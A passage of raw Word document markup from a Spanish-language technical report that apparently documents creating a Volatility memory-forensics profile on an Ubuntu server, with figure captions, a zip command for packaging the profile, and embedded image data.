&#10;AAAHAAcAvgEAAFlxAAAAAA==&#10;">
                <v:group id="_x0000_s1083" style="position:absolute;width:54006;height:19100" coordsize="54006,19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f1aywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gq96SaVpDZ1FZFWPIhQLZTeHtlnEsy+DdltEv+9Kwgeh5n5hpkvB1OLjlpXWVYQTyIQ&#10;xLnVFRcKfo5f4xkI55E11pZJwYUcLBdPozlm2vb8Td3BFyJA2GWooPS+yaR0eUkG3cQ2xME72dag&#10;D7ItpG6xD3BTy9coSqXBisNCiQ2tS8rPh3+jYNNjv5rGn93ufFpf/o7J/ncXk1Ivz8PqA4SnwT/C&#10;9/ZWK0hm72mavCVTuF0Kd0AurgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA85f1aywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                  <v:shape id="Imagen 13" o:spid="_x0000_s1084" type="#_x0000_t75" alt="Pantalla de celular con letras&#10;&#10;Descripción generada automáticamente" style="position:absolute;top:9646;width:54006;height:9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dTWxQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NSgMx&#10;EL4LvkMYwYvYpOtPy7ZpkYKgeOraBxg2083iZrJkYrt9eyMIHuf7n/V2CoM6UZI+soX5zIAibqPr&#10;ubNw+Hy9X4KSjOxwiEwWLiSw3VxfrbF28cx7OjW5UyWEpUYLPuex1lpaTwFlFkfiwh1jCpjLmTrt&#10;Ep5LeBh0ZcyzDthzafA40s5T+9V8BwsfOsqdP+4OydAg75IraS7B2tub6WUFKtOU/8V/7jdX5i+q&#10;x6cHY+YL+P2pAKA3PwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCSJdTWxQAAAOMAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                    <v:imagedata r:id="rId138" o:title="Pantalla de celular con letras&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                  <v:shape id="Imagen 11" o:spid="_x0000_s1085" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:54006;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cxdyAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9NawIx&#10;EIbvhf6HMIXeaqK4rW6N0k/qqaUq9DpspruLm8mSjLr+++ZQ8PjyfvEsVoPv1JFiagNbGI8MKOIq&#10;uJZrC7vt+90MVBJkh11gsnCmBKvl9dUCSxdO/E3HjdQqj3Aq0UIj0pdap6ohj2kUeuLs/YboUbKM&#10;tXYRT3ncd3pizL322HJ+aLCnl4aq/ebgLXDx8yrryfOXxI/pGT/nbyYd9tbe3gxPj6CEBrmE/9tr&#10;Z6EYT2dmXjxkiIyUcUAv/wAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCNZcxdyAAAAOIA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                    <v:imagedata r:id="rId139" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1086" type="#_x0000_t202" style="position:absolute;top:19234;width:5400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cVhywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/LasMw&#10;EEX3hf6DmEI3pZHzsAlOlBBCC203oW423Q3WxHJqjYwkJ+7fV4tClpf74qy3o+3EhXxoHSuYTjIQ&#10;xLXTLTcKjl+vz0sQISJr7ByTgl8KsN3c362x1O7Kn3SpYiPSCIcSFZgY+1LKUBuyGCauJ07eyXmL&#10;MUnfSO3xmsZtJ2dZVkiLLacHgz3tDdU/1WAVHBbfB/M0nF4+dou5fz8O++LcVEo9Poy7FYhIY7yF&#10;/9tvWsF8mRf5LJ8miISUcEBu/gAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBvycVhywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4C47CE47" w14:textId="5C39A78E" w:rsidR="00CD44B8" w:rsidRPr="00353A37" w:rsidRDefault="00CD44B8" w:rsidP="00CD44B8">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>20</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="58" w:name="_Toc155782587"/>
                        <w:r w:rsidRPr="003A5BFC">
                          <w:t>Generando perfil y visualizando su ubicación.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="58"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para la generación del perfil, procederemos, desde </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00BF6EEB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85</w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a ejecutar el comando para crear un archivo .zip </w:t>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00BF6EEB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo zip linux$(lsb_release -si)_$(uname -r)_profile.zip /home/jrodg85/volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="00BF6EEB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/tools/linux/module.dwarf /boot/System.map-4.15.0-1021-aws</w:t>
      </w:r>
      <w:r w:rsidR="0098259F" w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA1094" w14:textId="2AD1288B" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Para una aclaración de cualquier duda relativo a la elaboración de la elaboración de este servidor y las acciones realizadas en ella, se ha extraído el hist</w:t>
      </w:r>
      <w:r w:rsidR="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ó</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0098259F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ico</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> al completo para que cualquier persona pueda realizar los mismos pasos que he realizado para la creación del perfil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABACE78" w14:textId="0A13AB9C" w:rsidR="009B1250" w:rsidRPr="00894A5D" w:rsidRDefault="00487731" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34FDBADF" wp14:editId="7AE85985">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>898836</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5400675" cy="635"/>
                <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="243139766" name="Cuadro de texto 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52E75FC9" w14:textId="2B66C23B" w:rsidR="00CA2DBC" w:rsidRPr="00790002" w:rsidRDefault="00CA2DBC" w:rsidP="00CA2DBC">
                            <w:pPr>
                              <w:pStyle w:val="Descripcin"/>
                              <w:rPr>
                                <w:rFonts w:cs="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Ilustración </w:t>
                            </w:r>
                            <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                              <w:r w:rsidR="00117A4E">
                                <w:rPr>
                                  <w:noProof/>
                                </w:rPr>
                                <w:t>21</w:t>
                              </w:r>
                            </w:fldSimple>
                            <w:r>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:bookmarkStart w:id="59" w:name="_Toc155782588"/>
                            <w:r w:rsidRPr="00995B39">
                              <w:t>Nombre de perfil.</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DBADF" id="_x0000_s1087" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:70.75pt;width:425.25pt;height:.05pt;z-index:251739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xpSGgIAAEA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ICE+zjmTFLt+P481sstVhz58UdCwaBQcSZNElTje&#10;+9Cnjimxkwejy402Jv7EwNogOwrSr611UEPx37KMjbkW4q2+YPRkFxzRCt2uY7okjJ9GkDsoT4Qd&#10;oR8L7+RGU8N74cOTQJoDgkuzHR7pqAy0BYfB4qwG/PE3f8wneSjKWUtzVXD//SBQcWa+WhIuDuFo&#10;4GjsRsMemjUQ1BltjZPJpAsYzGhWCM0LjfwqdqGQsJJ6FTyM5jr0000rI9VqlZJo1JwI93brZCw9&#10;EvvcvQh0gyyB1HyAceJE/kqdPjfp41aHQFQn6SKxPYsD3zSmSfxhpeIe/Pqfsi6Lv/wJAAD//wMA&#10;UEsDBBQABgAIAAAAIQC0YYmT3gAAAAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI8xT8MwEIV3JP6D&#10;dUgsiDqFNKrSOFVVwQBLRejSzY2vcSA+R7HThn/PwQLb3Xund98r1pPrxBmH0HpSMJ8lIJBqb1pq&#10;FOzfn++XIELUZHTnCRV8YYB1eX1V6Nz4C73huYqN4BAKuVZgY+xzKUNt0ekw8z0Seyc/OB15HRpp&#10;Bn3hcNfJhyTJpNMt8Qere9xarD+r0SnYpYedvRtPT6+b9HF42Y/b7KOplLq9mTYrEBGn+HcMP/iM&#10;DiUzHf1IJohOAReJrKbzBQi2l4uEh+OvkoEsC/m/QPkNAAD//wMAUEsBAi0AFAAGAAgAAAAhALaD&#10;OJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEAsaMaUhoCAABABAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAtGGJk94AAAAIAQAADwAAAAAAAAAAAAAAAAB0BAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAH8FAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="52E75FC9" w14:textId="2B66C23B" w:rsidR="00CA2DBC" w:rsidRPr="00790002" w:rsidRDefault="00CA2DBC" w:rsidP="00CA2DBC">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Ilustración </w:t>
                      </w:r>
                      <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                        <w:r w:rsidR="00117A4E">
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>21</w:t>
                        </w:r>
                      </w:fldSimple>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:bookmarkStart w:id="60" w:name="_Toc155782588"/>
                      <w:r w:rsidRPr="00995B39">
                        <w:t>Nombre de perfil.</w:t>
                      </w:r>
                      <w:bookmarkEnd w:id="60"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44BFD22D" wp14:editId="612F9EB4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>184785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400675" cy="697865"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6985"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="103307917"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7917" name="Imagen 14" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400675" cy="697865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008235EF" w:rsidRPr="00894A5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[Anexo</w:t>
      </w:r>
      <w:r w:rsidR="00894A5D" w:rsidRPr="00894A5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00894A5D" w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00894A5D" w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155654021 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="00894A5D" w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00894A5D" w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>VI. Historial del Virtual Ubuntu Server para generación de perfil.</w:t>
      </w:r>
      <w:r w:rsidR="00894A5D" w:rsidRPr="00B97A1E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008235EF" w:rsidRPr="00894A5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF762E" w14:textId="4B397C25" w:rsidR="00E23DB4" w:rsidRPr="00CA2DBC" w:rsidRDefault="002F18FA" w:rsidP="00CA2DBC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5889EE0F" wp14:editId="70783DB5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2268796</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5795813" cy="1826895"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="404178370" name="Grupo 11"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5795813" cy="1826895"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5795813" cy="1826895"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="453483355" name="Grupo 5"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5668010" cy="1826895"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5668045" cy="1827474"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="946200105" name="Imagen 20" descr="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>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2225710" y="0"/>
                              <a:ext cx="3442335" cy="1316990"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="1062258312" name="Imagen 15" descr="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente"/>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5024"/>
                              <a:ext cx="2149475" cy="1822450"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="1939738193" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2363638" y="1406106"/>
                            <a:ext cx="3432175" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6ADE00B0" w14:textId="6306BFD1" w:rsidR="00CA2DBC" w:rsidRPr="00AF10E2" w:rsidRDefault="00CA2DBC" w:rsidP="00CA2DBC">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>22</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="61" w:name="_Toc155782589"/>
                              <w:r w:rsidRPr="00225B1B">
                                <w:t>Propiedades del perfil y comprobación.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89EE0F" id="Grupo 11" o:spid="_x0000_s1088" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:178.65pt;width:456.35pt;height:143.85pt;z-index:251742208;mso-position-horizontal:center;mso-position-horizontal-relative:margin" coordsize="57958,18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XZIZAQAADMMAAAOAAAAZHJzL2Uyb0RvYy54bWzkVltuGzcU/S/QPRBT&#10;oF+OpXnoWcuBKteGASMxagf5pjgcicgMyZIcS85usoYswRvrIWdGii0Hadz2oygMjy7fl4fnnntP&#10;Xm+rktxxY4WSsyg+7keES6ZyIVez6N3t+atxRKyjMqelknwW3XMbvT798YeTjZ7yRK1VmXNDsIm0&#10;042eRWvn9LTXs2zNK2qPleYSg4UyFXVomlUvN3SD3auyl/T7w95GmVwbxbi16D1rBqPTsH9RcObe&#10;FoXljpSzCL658DXhu/Tf3ukJna4M1WvBWjfoC7yoqJA4dLfVGXWU1EYcbFUJZpRVhTtmquqpohCM&#10;hzvgNnH/yW0ujKp1uMtqulnpHUyA9glOL96Wvbm7MPpGXxsgsdErYBFa/i7bwlT+F16SbYDsfgcZ&#10;3zrC0DkYTQbjOI0Iw1g8TobjyaABla2B/ME6tv7tGyt73cG9R+7sGo2b8PvaEJHPomyQZuM0HQwi&#10;ImkFil2YWisSvPCL/vYNh8MxnuYlN/QrM/jVYjPKRpnH5is31IJN8d++MqyDV/52NGCVqw2P2k2q&#10;v7RHRc2HWr8CITV1YilK4e5DcIF63il5dy3YtWkae+An2RARGPd3wF9WdMUlSYBVzi1DlL2TlDCq&#10;4RJFF9FUOlqWwa79EE6sHc2VoT//tJ3/Ej5nfqnQTDx8lgT7cUNzSmjtVPXwyQmGN5aOexy9b96d&#10;xjnqwbtS7IMlUi3WVK743GoIAHgZUH88veebj262LIU+F2XpKe/tFkNc40mwPfMMTSCfKVZ77xpl&#10;MrwEnEratdA2ImbKqyUHYc1lHoMTUEUHtmojpGsixjrDHVv78wv48Tt8b9iyGwhO7/30V7AI3WeC&#10;NUmSwciz9jBk0yxLEC8tLdN4OJkEHdzREkga6y64qog34DE8ARfolN5d2danbgrovHcjmGg2bwPj&#10;P0PmuD8EYuM0TjoZadkcA6iWzZfgnSnoR0/l2tbUCEVW5uETNJwekVtIojoic12iGdh7RBbKGK4I&#10;LwGgAZ8FU/8vogPNf5noDcUH/SRIK512iSmJs0k26lg+TpJs8M+zfJ+ifFZCBWM71UDrQDe+K0nf&#10;rKnmCDq/7V5z40k6GaVj/HQ0XdQ0N8pT0nkCkqB17SKf1onb/qqQqHf9XxOMdIg/VGs+j2f9IQKi&#10;UaUO0DRLk7gDNBmnY2S2L5PZd6oGnVpVirwTXC8ni9KQO4pCbbMWjcJDkh7NKqVXIan8quZs34NX&#10;sK0Oesttl9tQGSARYZLvWqr8HlAYBTEDYaxm5wIHXlHrrqlBwYdOFLHuLT5FqTazSLVWRNbKfHyu&#10;38/HE2M0IhsUkLPI/gFN4BEpLyUeH1u6zjCdsewMWVcLhasiE8CbYGKBcWVnFkZV71Hbzv0pGKKS&#10;4axZ5Dpz4dDCAGpjxufzYDcp/EreaCT+OEi2B/Z2+54a3Yq5p8kb1dHrQNObuR5mq+dIuuciCP4e&#10;xRZvUD1YoTKF9aj0/bIdZu1r/dM/AQAA//8DAFBLAwQKAAAAAAAAACEAtx4ih8XtAADF7QAAFAAA&#10;AGRycy9tZWRpYS9pbWFnZTEucG5niVBORw0KGgoAAAANSUhEUgAAA0IAAAE/CAYAAABrfXNCAAAA&#10;AXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsEAAA7BAbiRa+0AAABjaVRYdFNu&#10;aXBNZXRhZGF0YQAAAAAAeyJjbGlwUG9pbnRzIjpbeyJ4IjowLCJ5IjowfSx7IngiOjEwMjksInki&#10;